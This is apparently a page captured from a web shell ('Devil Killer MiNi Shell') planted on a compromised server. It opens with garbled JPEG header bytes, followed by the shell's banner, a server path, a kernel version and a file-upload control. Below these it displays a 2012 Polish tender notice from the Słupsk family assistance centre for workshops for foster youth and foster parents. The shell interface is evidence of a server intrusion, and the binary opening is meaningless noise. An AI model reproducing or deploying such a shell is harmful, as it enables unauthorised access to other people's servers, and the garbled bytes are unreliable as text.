JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120516/158244-N-2012.html

<p class="kh_header"><b>Słupsk: Przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie warsztatów dla: wychowanków placówki opiekuńczo-wychowawczej w wieku 15-25 lat, wychowanków rodzin zastępczych w wieku 17 - 21 lat oraz rodziców zastępczych, pochodzących z terenu powiatu słupskiego - uczestników projektu systemowego pn. Wyższe kwalifikacje zawodowe - większe możliwości na rynku pracy realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Słupsku w ramach poddziałania 7.1.2 Programu Operacyjnego Kapitał Ludzki 2007-2013 współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 158244 - 2012; data zamieszczenia: 16.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , Al. Sienkiewicza 20, 76-200 Słupsk, woj. pomorskie, tel. 059 8414311, faks 059 841 0196.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.pcpr.slupsk.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiot zamówienia obejmuje zorganizowanie i przeprowadzenie warsztatów dla: wychowanków placówki opiekuńczo-wychowawczej w wieku 15-25 lat, wychowanków rodzin zastępczych w wieku 17 - 21 lat oraz rodziców zastępczych, pochodzących z terenu powiatu słupskiego - uczestników projektu systemowego pn. Wyższe kwalifikacje zawodowe - większe możliwości na rynku pracy realizowanego przez Powiatowe Centrum Pomocy Rodzinie w Słupsku w ramach poddziałania 7.1.2 Programu Operacyjnego Kapitał Ludzki 2007-2013 współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie realizowane będzie poprzez różne formy wsparcia w poniższych zakresach tematycznych:
Część I - Warsztat kompetencji społecznych
Warsztat jest skierowany do 12 wychowanków placówki opiekuńczo-wychowawczej w wieku 15-25 lat.
Celem warsztatów jest wzrost kompetencji społecznych uczestników, tj. nabycie umiejętności zachowania asertywnego, poprawa komunikacji interpersonalnej i zweryfikowanie u uczestników wiedzy na temat roli kobiety i mężczyzny w rodzinie, stereotypów dotyczących płci oraz możliwości rozwiązywania konfliktów rodzinnych.
Zamówienie realizowane będzie z wykorzystaniem zagadnień z zakresu edukacji psychospołecznej, w tym: trening integracyjny, asertywności, komunikacji interpersonalnej, rozwiązywanie konfliktów, sztuka współpracy i kompromisów, pełnienie ról matki - ojca, żony - męża, z czego min 80% czasu trwania warsztatów przeprowadzić należy za pomocą aktywnych metod pracy z grupą, tj.: ćwiczenia twórcze, scenki rodzajowe, gry, dyskusja.
Zamówienie realizowane będzie w jednej grupie 12- osobowej w łącznej ilości 12 godzin lekcyjnych.
Termin realizacji części I -  do końca czerwca 2012r. w godzinach popołudniowych (dokładny terminarz spotkań ustalony zostanie z Wykonawcą na etapie podpisywania umowy).
Miejsce realizacji zamówienia: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20 (zapewnienie sali szkoleniowej, materiałów biurowych niezbędnych do przeprowadzenia warsztatu, poczęstunku oraz poniesienie kosztów związanych z dojazdem uczestników na spotkania leży po stronie Zamawiającego).
Wykonawca zobowiązany jest do: 
- zapewnienia materiałów szkoleniowych dla każdego uczestnika projektu (w tym jeden dodatkowy do dokumentacji projektowej),             
- zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć,
- oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013;

Część II - Warsztat savoir - vivre - dobre obyczaje otwierają drzwi
Warsztat jest skierowany do 12 wychowanków placówki opiekuńczo-wychowawczej w wieku 15-25 lat.
Celem warsztatów jest przyswojenie podstawowych zasad dobrego wychowania, nauka dobrych manier, nabycie umiejętności zachowania się przy stole, w teatrze i kinie, dobór odpowiedniego stroju na ważne okazje. Warsztat zakończy się praktycznym wykorzystaniem wiedzy podczas wyjścia do teatru i restauracji.
Zamówienie realizowane będzie w dwóch etapach: 
- I etap - część teoretyczna w ilości 12 godzin lekcyjnych, w tym 80% czasu trwania warsztatów przeprowadzić należy za pomocą aktywnych metod pracy z grupą, tj.: scenki rodzajowe, ćwiczenia itp. 
- II etap -  część praktyczna w ilości około 5 godzin zegarowych, tj. wyjście do teatru i restauracji w Słupsku.
Termin realizacji części II - do końca lipca 2012r., w tym:
- etap I: spotkania od poniedziałku do piątku w godzinach popołudniowych (dokładny terminarz spotkań ustalony zostanie z Wykonawcą na etapie podpisywania umowy);  
- etap II odbędzie się w sobotę - dokładna godzina spotkania uzależniona będzie od repertuaru spektakli w teatrze.
Miejsce realizacji zamówienia: 
-etap I - siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20 ;
-etap II - teatr i restauracja na terenie Słupska 
Zapewnienie sali szkoleniowej, materiałów biurowych niezbędnych do przeprowadzenia warsztatu, poczęstunku, poniesienie kosztów związanych z dojazdem uczestników na spotkania, zakup biletów na spektakl do teatru dla uczestników projektu, dwóch opiekunów  oraz trenera, jak również pokrycie kosztów zamówionych posiłków w restauracji dla ww. osób leży po stronie Zamawiającego.
Wykonawca zobowiązany jest do:
- zapewnienia materiałów szkoleniowych dla każdego uczestnika projektu (w tym jeden dodatkowy do dokumentacji projektowej),
- zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć,
- oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013.
Część III - Warsztat na temat kreowania własnego wizerunku
Warsztat jest skierowany do 8 wychowanków rodzin zastępczych w wieku 17-21 lat.
Celem warsztatów jest wzrost umiejętności pozytywnego kreowania własnego wizerunku, poznanie zasad dobierania ubioru i dbania o higienę, jednym z elementów warsztatu będzie autoprezentacja uczestników.
Zamówienie realizowane będzie w łącznej ilości 9 godzin lekcyjnych, w tym min 80% czasu trwania warsztatów przeprowadzić należy za pomocą aktywnych metod pracy z grupą, tj.: ćwiczenia twórcze, dyskusja na temat kreowania wizerunku, tego jak jesteśmy postrzegani przez innych, co wpływa na kształtowanie się opinii, kiedy ludzie kierują się stereotypami itp. 
Udział w zajęciach warsztatowych weźmie 8 uczestników projektu i ich najbliższe otoczenie (max 8 osób, jeżeli będzie taka potrzeba ze strony uczestników projektu).
Termin realizacji części III - do końca czerwca 2012r. w godzinach popołudniowych (dokładny terminarz spotkań ustalony zostanie z Wykonawcą na etapie podpisywania umowy).
Miejsce realizacji zamówienia: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20 (zapewnienie sali szkoleniowej, materiałów biurowych niezbędnych do przeprowadzenia warsztatu, poczęstunku oraz poniesienie kosztów związanych z dojazdem uczestników na spotkania leży po stronie Zamawiającego).
Wykonawca zobowiązany jest do:
- zapewnienia materiałów szkoleniowych dla 8 uczestników projektu oraz jeden dodatkowy do dokumentacji projektowej
- zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć,
- oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013;
Część IV - Warsztat przedsiębiorczości
Warsztat jest skierowany do 8 wychowanków rodzin zastępczych w wieku 17-21 lat.
Celem warsztatów jest kształtowanie postaw samodzielności uczestników, wzrost umiejętności podejmowania samodzielnych decyzji życiowych i inicjatyw, rozwianie obaw uczestników związanych  z wejściem w dorosłe życie oraz wzmocnienie w uczestnikach wiary we własne możliwości, a także wyposażenie uczestników w wiedzę na temat różnych instytucji świadczących pomoc, np. w uzyskaniu zatrudnienia, mieszkania itp.
Zamówienie realizowane będzie w łącznej ilości 15 godzin lekcyjnych, w tym min 80% czasu trwania warsztatów przeprowadzić należy za pomocą aktywnych metod pracy z grupą, tj.: ćwiczenia twórcze, scenki rodzajowe, gry. 
Udział w zajęciach warsztatowych weźmie 8 uczestników projektu i ich najbliższe otoczenie (max 8 osób, jeżeli będzie taka potrzeba ze strony uczestników projektu).
Termin realizacji części IV - do końca sierpnia 2012r. w godzinach popołudniowych (dokładny terminarz spotkań ustalony zostanie z Wykonawcą na etapie podpisywania umowy).
Miejsce realizacji zamówienia: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20 (zapewnienie sali szkoleniowej, materiałów biurowych niezbędnych do przeprowadzenia warsztatu, poczęstunku oraz poniesienie kosztów związanych z dojazdem uczestników na spotkania leży po stronie Zamawiającego).
Wykonawca zobowiązany jest do: 
-  zapewnienia materiałów szkoleniowych dla 8 uczestników projektu oraz jeden dodatkowy do dokumentacji projektowej,
- zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć,
- oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013;
Część V - Warsztat Szkoła rodzica
Zamówienie realizowane będzie w dwóch etapach:
Etap I: zajęcia warsztatowe skierowane do 15 rodziców zastępczych.
Celem warsztatów jest wzrost kompetencji społecznych i wychowawczych uczestników, tj. poprawa komunikacji w rodzinie, nawiązanie głębszych relacji z dziećmi, nabycie umiejętności radzenia sobie ze stresem, rozwiązywania konfliktów rodzinnych i pokonywania trudności w sytuacjach kryzysowych, a także uświadomienie uczestnikom istoty współpracy z rodziną biologiczną dziecka oraz właściwej roli kobiety i mężczyzny w rodzinie.
Zamówienie realizowane będzie z wykorzystaniem:  treningu z komunikacji w rodzinie, metod radzenia sobie ze stresem, rozwiązywania konfliktów rodzinnych, zagadnień dotyczących sztuki współpracy i kompromisów oraz roli kobiety i mężczyzny w rodzinie, w łącznej ilości 12 godzin lekcyjnych, z czego min 80% czasu trwania warsztatów przeprowadzić należy za pomocą aktywnych metod pracy z grupą, tj.: ćwiczenia twórcze, scenki rodzajowe, gry, dyskusja itp.
Miejsce realizacji zamówienia: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20 (zapewnienie sali szkoleniowej, materiałów biurowych niezbędnych do przeprowadzenia warsztatu, poczęstunku oraz poniesienie kosztów związanych z dojazdem uczestników na spotkania leży po stronie Zamawiającego).
Wykonawca zobowiązany jest do: 
-zapewnienia materiałów szkoleniowych dla każdego uczestnika projektu (w tym jeden dodatkowy do dokumentacji projektowej),
-zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć, 
-oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013;
Etap II: 2-dniowy pobyt rodziców zastępczych i ich dzieci w Karwnie, gdzie mieści się Wioska fantazji. 
W tym etapie udział weźmie 15 rodzin zastępczych, tj. uczestnicy projektu, ich małżonkowie i dzieci. Przewiduje się, iż udział w wyjeździe weźmie nie więcej niż 55 osób, jednak dokładna ilość osób zostanie wskazana na etapie realizacji zamówienia (w momencie zawierania umowy z Wykonawcą).
Celem  wyjazdu jest większa integracja członków rodzin poprzez różne formy aktywnego spędzania czasu: m.in. gry terenowe i zabawy integracyjno - animacyjne, które będą również sprzyjać pogłębieniu więzi emocjonalnych. W programie warsztatów należy uwzględnić zajęcia o charakterze integracyjno - animacyjnym, w tym zajęcia bębniarskie, kuglarskie, żonglerki, zabawy z chustą Klanzy, taniec hula.
Miejsce realizacji zamówienia:  Karwno (gmina Czarna Dąbrówka, woj. pomorskie), Wioska fantazji.
Zamawiający zapewnia uczestnikom projektu, ich rodzinom oraz 2 opiekunom (koordynator projektu i pracownik socjalny): transport ze Słupska do Karwna i z Karwna do Słupska, wyżywienie, nocleg.
Wykonawca zobowiązany jest do:
-przeprowadzenia zajęć w Wiosce fantazji w Karwnie, tj. w sobotę od godziny 10.00 do godz. 18.30, w tym 2-godzinna przerwa obiadowa i dwie przerwy 15-minutowe kawowe - łącznie 8 godz. dydaktycznych zajęć, oraz w niedzielę od godziny 10.00 do godz.14.15, w tym 2 przerwy 15-minutowe kawowe - 5 godzin dydaktycznych zajęć. W programie warsztatów należy uwzględnić zajęcia o charakterze integracyjno - animacyjnym, w tym zajęcia bębniarskie, kuglarskie, żonglerki, zabawy z chustą Klanzy, taniec hula.
- zapewnienie niezbędnych akcesoriów do przeprowadzenia zajęć,
- oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013;
Termin realizacji części V: 
-etap I do końca czerwca 2012 r., spotkania odbędą się od poniedziałku do piątku w godzinach popołudniowych (dokładny terminarz spotkań ustalony zostanie z Wykonawcą na etapie podpisywania umowy);
-etap II do końca czerwca 2012 r., - pobyt w Karwnie w czasie weekendu, od soboty do niedzieli z noclegiem; planowany przyjazd do Karwna w sobotę: godz. 09.00; planowany wyjazd z Karwna w niedzielę: godz. 16.00  (dokładny terminarz spotkań ustalony zostanie z Wykonawcą na etapie podpisywania umowy);.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, do 50% wartości zamówienia podstawowego, polegających na powtórzeniu tych samych zajęć w przypadku, jeżeli zamówiona ilość okaże się niewystarczająca lub jeżeli zaistnieje konieczność skierowania do udziału większej ilości Uczestników i/lub jeżeli w okresie następnych trzech lat od podpisania umowy koniecznym okaże się nabycie usług tożsamych z przedmiotem zamówienia, na przykład w ramach kolejnych projektów EFS i/lub w ramach podstawowej działalności zamawiającego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku - oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku - oświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku - oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I
Wykonawca dysponuje co najmniej jedną osobą, która przeprowadzi warsztat kompetencji społecznych, posiadającą wykształcenie co najmniej magisterskie psychologiczne, posiadającą od co najmniej 4 lat uprawnienia do wykonywania zawodu psychologa, licząc do terminu składania ofert, posiadającą doświadczenie w prowadzeniu zajęć warsztatowych/szkoleń/innych tożsamych zajęć grupowych, czyli przeprowadziła co najmniej jeden warsztat/szkolenie/inne tożsame zajęcia grupowe dla młodzieży z zakresu kompetencji społecznych.
Część II
Wykonawca dysponuje co najmniej jedną osobą, która przeprowadzi warsztat Savoir vivre - dobre obyczaje otwierają drzwi, posiadającą wykształcenie co najmniej wyższe magisterskie oraz doświadczenie w prowadzeniu zajęć warsztatowych/szkoleń/innych tożsamych zajęć grupowych z zakresu savoir vivre, czyli przeprowadziła co najmniej jeden warsztat/szkolenie/inne tożsame zajęcia grupowe z zakresu savoir vivre.
Część III
Wykonawca dysponuje co najmniej jedną osobą, która przeprowadzi warsztat na temat kreowania własnego wizerunku, posiadającą wykształcenie co najmniej wyższe magisterskie oraz doświadczenie w prowadzeniu zajęć warsztatowych/szkoleń/innych tożsamych zajęć grupowych z zakresu kreowania wizerunku/ wizażu/ stylizacji lub autoprezentacji, czyli przeprowadziła co najmniej jeden warsztat/szkolenie/inne tożsame zajęcia grupowe z zakresu kreowania wizerunku/  wizażu/ stylizacji lub autoprezentacji.
Część IV
Wykonawca dysponuje co najmniej jedną osobą, która przeprowadzi warsztat przedsiębiorczości, posiadającą wykształcenie co najmniej wyższe magisterskie o kierunku praca socjalna oraz posiadającą od co najmniej 2 lat doświadczenie w usamodzielnianiu wychowanków rodzin zastępczych i placówek opiekuńczo-wychowawczych, licząc do terminu składania ofert. 
Część V
Wykonawca dysponuje co najmniej jedną osobą, która przeprowadzi warsztat Szkoła rodzica, posiadającą wykształcenie co najmniej magisterskie pedagogiczne lub psychologiczne, posiadającą od co najmniej 4 lat uprawnienia do wykonywania zawodu psychologa lub pedagoga, licząc do terminu składania ofert, oraz posiadającą doświadczenie w prowadzeniu zajęć warsztatowych/szkoleń/innych tożsamych zajęć grupowych dla rodziców i rodzin, czyli przeprowadziła co najmniej jeden warsztat/szkolenie/inne tożsame zajęcia grupowe dot. pracy z rodziną</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku - oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy - Prawo zamówień publicznych przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach: - w uzasadnionych i nieprzewidzianych przypadkach za zgodą Zamawiającego możliwa jest zmiana terminu realizacji
zamówienia, - harmonogramy stanowiące załączniki do umowy mogą podlegać modyfikacji w uzasadnionych i nierzewidzianych przypadkach za
porozumieniem obu stron, - osoby wskazane w ofercie jako odpowiedzialne za świadczenie usług za zgodą Zamawiającego będą mogły zostać zastąpione innymi o nie niższych kwalifikacjach, doświadczeniu i wykształceniu określonych w SIWZ (warunki), - zmianie mogą podlegać omyłki pisarskie nie rzutujące na zamiar i cel stron wynikający z umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pcpr.slupsk.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy w Słupsku ul. Sienkiewicza 20 ; 76-200
Słupsk Nr telefonu: +48 59 841 43 11 nr faksu: +48 59 841 01 96.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.05.2012 godzina 10:00, miejsce: Powiatowe Centrum Pomocy w Słupsku ul. Sienkiewicza 20 ; 76-200
Słupsk, woj. pomorskie, pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest przez Unię Europejską w ramach środków Europejskiego funduszu Społecznego Programu Operacyjnego Kapitał Ludzki.</p>
